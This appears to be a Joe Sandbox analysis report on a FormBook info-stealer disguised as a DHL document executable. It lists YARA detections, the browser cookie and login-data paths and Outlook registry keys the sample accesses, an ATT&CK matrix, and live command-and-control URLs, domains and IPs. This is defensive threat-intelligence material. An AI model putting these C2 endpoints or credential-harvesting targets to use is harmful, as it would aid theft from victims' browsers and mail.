Code function: 0_2_0042B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_0042B952

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_003F42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_003F42DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.3b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3724047677.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1403314556.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3714293337.0000000002750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1402648327.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3724137057.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1403351196.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3726222348.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3724240548.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: DHL-DOC83972025-1.exe	Binary or memory string: WIN_81
Source: DHL-DOC83972025-1.exe	Binary or memory string: WIN_XP
Source: DHL-DOC83972025-1.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: DHL-DOC83972025-1.exe	Binary or memory string: WIN_XPe
Source: DHL-DOC83972025-1.exe	Binary or memory string: WIN_VISTA
Source: DHL-DOC83972025-1.exe	Binary or memory string: WIN_7
Source: DHL-DOC83972025-1.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.3b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3724047677.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1403314556.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3714293337.0000000002750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1402648327.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3724137057.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1403351196.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3726222348.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3724240548.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00471204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_00471204
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00471806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00471806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DHL-DOC83972025-1.exe	47%	ReversingLabs	Win32.Trojan.AutoitInject
DHL-DOC83972025-1.exe	33%	Virustotal		Browse
DHL-DOC83972025-1.exe	100%	Avira	DR/AutoIt.Gen8
DHL-DOC83972025-1.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.magmadokum.com/fo8o/?tjVTF=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNRwjYf1m964qUSTP7WQyE0w3buAATyqoGj3VWMs6RJMKNOUgjB5nLBKL&2na=ihrTFVnP9VKx	0%	Avira URL Cloud	safe
https://www.empowermedeco.com/fo8o/?tjVTF=mxnR	0%	Avira URL Cloud	safe
http://www.3xfootball.com/fo8o/?tjVTF=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyPSqftK4e48VmHPHqtN0zR7rhi1sr30t/oMfgteNmFfmnntRnM0qQ0ZY&2na=ihrTFVnP9VKx	0%	Avira URL Cloud	safe
http://www.techchains.info/fo8o/	100%	Avira URL Cloud	malware
http://www.goldenjade-travel.com/fo8o/?tjVTF=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxnciuyQt15M5Zq/CPuMEXgodEuvjC2Tprvq68sXKyaNl/eQdY42yXteh&2na=ihrTFVnP9VKx	100%	Avira URL Cloud	malware
http://www.empowermedeco.com	0%	Avira URL Cloud	safe
http://www.elettrosistemista.zip/fo8o/?tjVTF=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMnVmQq+lm2z9nd9BQOLzJZJregrcunvpsiXNjQ3cRjwhNT6H4Su73WUG&2na=ihrTFVnP9VKx	100%	Avira URL Cloud	malware
http://www.rssnewscast.com/fo8o/?tjVTF=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp8oWpH63NEiVxRUOej85ag7JBXkSrwNx0GMHe1VrOeoqYxhSWqtxVT73&2na=ihrTFVnP9VKx	100%	Avira URL Cloud	malware
http://www.empowermedeco.com/fo8o/?tjVTF=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYVFf0Y/CRrIidra9fUChJErWJpFnwi4qHc/7DUMj+ceuAXwSmcXIkD1z&2na=ihrTFVnP9VKx	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
elettrosistemista.zip	195.110.124.133	true	false	high
empowermedeco.com	217.196.55.202	true	false	high
www.3xfootball.com	154.215.72.110	true	false	high
www.goldenjade-travel.com	116.50.37.244	true	false	high
www.rssnewscast.com	91.195.240.94	true	false	high
www.techchains.info	66.29.149.46	true	false	high
natroredirect.natrocdn.com	85.159.66.93	true	false	high
www.magmadokum.com	unknown	unknown	true	unknown
www.donnavariedades.com	unknown	unknown	false	high
www.660danm.top	unknown	unknown	true	unknown
www.joyesi.xyz	unknown	unknown	false	high
www.liangyuen528.com	unknown	unknown	true	unknown
www.kasegitai.tokyo	unknown	unknown	true	unknown
www.empowermedeco.com	unknown	unknown	false	high
www.k9vyp11no3.cfd	unknown	unknown	true	unknown
www.elettrosistemista.zip	unknown	unknown	false	high
www.antonio-vivaldi.mobi	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.magmadokum.com/fo8o/?tjVTF=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNRwjYf1m964qUSTP7WQyE0w3buAATyqoGj3VWMs6RJMKNOUgjB5nLBKL&2na=ihrTFVnP9VKx	true	Avira URL Cloud: safe	unknown
http://www.goldenjade-travel.com/fo8o/?tjVTF=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxnciuyQt15M5Zq/CPuMEXgodEuvjC2Tprvq68sXKyaNl/eQdY42yXteh&2na=ihrTFVnP9VKx	true	Avira URL Cloud: malware	unknown
http://www.empowermedeco.com/fo8o/	false		high
http://www.elettrosistemista.zip/fo8o/	false		high
http://www.rssnewscast.com/fo8o/?tjVTF=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp8oWpH63NEiVxRUOej85ag7JBXkSrwNx0GMHe1VrOeoqYxhSWqtxVT73&2na=ihrTFVnP9VKx	true	Avira URL Cloud: malware	unknown
http://www.magmadokum.com/fo8o/	false		high
http://www.3xfootball.com/fo8o/?tjVTF=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyPSqftK4e48VmHPHqtN0zR7rhi1sr30t/oMfgteNmFfmnntRnM0qQ0ZY&2na=ihrTFVnP9VKx	true	Avira URL Cloud: safe	unknown
http://www.rssnewscast.com/fo8o/	false		high
http://www.elettrosistemista.zip/fo8o/?tjVTF=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMnVmQq+lm2z9nd9BQOLzJZJregrcunvpsiXNjQ3cRjwhNT6H4Su73WUG&2na=ihrTFVnP9VKx	true	Avira URL Cloud: malware	unknown
http://www.empowermedeco.com/fo8o/?tjVTF=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYVFf0Y/CRrIidra9fUChJErWJpFnwi4qHc/7DUMj+ceuAXwSmcXIkD1z&2na=ihrTFVnP9VKx	true	Avira URL Cloud: safe	unknown
http://www.goldenjade-travel.com/fo8o/	false		high
http://www.techchains.info/fo8o/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	netbtugc.exe, 0000000A.00000003.1687881602.00000000078ED000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	netbtugc.exe, 0000000A.00000003.1687881602.00000000078ED000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	netbtugc.exe, 0000000A.00000003.1687881602.00000000078ED000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	netbtugc.exe, 0000000A.00000003.1687881602.00000000078ED000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	netbtugc.exe, 0000000A.00000003.1687881602.00000000078ED000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.empowermedeco.com	CKQtyFoaVDYewUznZxosidSwbd.exe, 0000000C.00000002.3726222348.0000000004D00000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	netbtugc.exe, 0000000A.00000003.1687881602.00000000078ED000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.empowermedeco.com/fo8o/?tjVTF=mxnR	netbtugc.exe, 0000000A.00000002.3725601307.0000000004C9A000.00000004.10000000.00040000.00000000.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 0000000C.00000002.3724645158.0000000003DAA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_	netbtugc.exe, 0000000A.00000002.3727059052.0000000005EA0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3725601307.000000000432E000.00000004.10000000.00040000.00000000.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 0000000C.00000002.3724645158.000000000343E000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.sedo.com/services/parking.php3	CKQtyFoaVDYewUznZxosidSwbd.exe, 0000000C.00000002.3724645158.000000000343E000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	netbtugc.exe, 0000000A.00000003.1687881602.00000000078ED000.00000004.00000020.00020000.00000000.sdmp	false		high
https://codepen.io/uzcho_/pens/popular/?grid_type=list	netbtugc.exe, 0000000A.00000002.3725601307.0000000004652000.00000004.10000000.00040000.00000000.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 0000000C.00000002.3724645158.0000000003762000.00000004.00000001.00040000.00000000.sdmp	false		high
https://codepen.io/uzcho_/pen/eYdmdXw.css	netbtugc.exe, 0000000A.00000002.3725601307.0000000004652000.00000004.10000000.00040000.00000000.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 0000000C.00000002.3724645158.0000000003762000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	netbtugc.exe, 0000000A.00000003.1687881602.00000000078ED000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	netbtugc.exe, 0000000A.00000003.1687881602.00000000078ED000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.195.240.94	www.rssnewscast.com	Germany	47846	SEDO-ASDE	false
154.215.72.110	www.3xfootball.com	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	false
195.110.124.133	elettrosistemista.zip	Italy	39729	REGISTER-ASIT	false
116.50.37.244	www.goldenjade-travel.com	Taiwan; Republic of China (ROC)	18046	DONGFONG-TWDongFongTechnologyCoLtdTW	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false
66.29.149.46	www.techchains.info	United States	19538	ADVANTAGECOMUS	false
217.196.55.202	empowermedeco.com	Norway	29300	AS-DIRECTCONNECTNO	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1586545
Start date and time:	2025-01-09 09:40:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DHL-DOC83972025-1.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@16/7
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 90% Number of executed functions: 44 Number of non-executed functions: 296
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:44:13	API Interceptor	12118126x Sleep call for process: netbtugc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.195.240.94	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	236236236.elf	Get hash	malicious	Unknown	Browse	suboyule.736t.com/
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 30312052024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
154.215.72.110	wOoESPII08.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
	N2sgk6jMa2.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
	Document 151-512024.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.3xfootball.com	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 30312052024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	CCE 30411252024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
www.goldenjade-travel.com	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 30312052024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	CCE 30411252024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
POWERLINE-AS-APPOWERLINEDATACENTERHK	gompsl.elf	Get hash	malicious	Mirai	Browse	156.251.7.182
	garm5.elf	Get hash	malicious	Mirai	Browse	156.242.206.46
	garm7.elf	Get hash	malicious	Mirai	Browse	156.242.206.54
	gmips.elf	Get hash	malicious	Mirai	Browse	156.251.7.140
	earm5.elf	Get hash	malicious	Mirai	Browse	156.251.7.164
	earm.elf	Get hash	malicious	Mirai	Browse	156.251.7.161
	eppc.elf	Get hash	malicious	Mirai	Browse	156.251.7.143
	ORDER REF 47896798 PSMCO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	154.213.39.66
	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
REGISTER-ASIT	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 30312052024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	SRT68.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
DONGFONG-TWDongFongTechnologyCoLtdTW	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse	101.0.232.112
	mpsl.elf	Get hash	malicious	Mirai, Moobot	Browse	119.15.228.125
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
SEDO-ASDE	http://thehalobun.com/	Get hash	malicious	HTMLPhisher	Browse	91.195.240.19
	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	236236236.elf	Get hash	malicious	Unknown	Browse	91.195.240.94
